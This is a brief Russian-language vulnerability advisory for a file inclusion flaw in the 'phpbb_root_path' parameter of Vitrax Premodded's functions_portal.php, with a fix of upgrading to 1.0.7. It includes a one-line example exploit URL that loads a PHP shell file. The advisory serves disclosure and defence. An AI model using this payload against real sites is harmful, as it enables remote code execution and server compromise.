Программа: Vitrax Premodded до версии 1.0.7
Опасность: Критическая
Наличие эксплоита: Да
Описание: Злоумышленник может скомпрометировать уязвимую систему.
Сценарийincludes/functions_portal.php не достаточно фильтрует данные впараметре "phpbb_root_path" перед использованием для включения файлов.В результате можно выполнить произвольный PHP код, включая файлы слокальных или удаленных источников.
Пример/Эксплоит: http://[target]/[path]/includes/functions_portal.php?phpbb_root_path=phpshell.txt?
Решение:Установите версию 1.0.7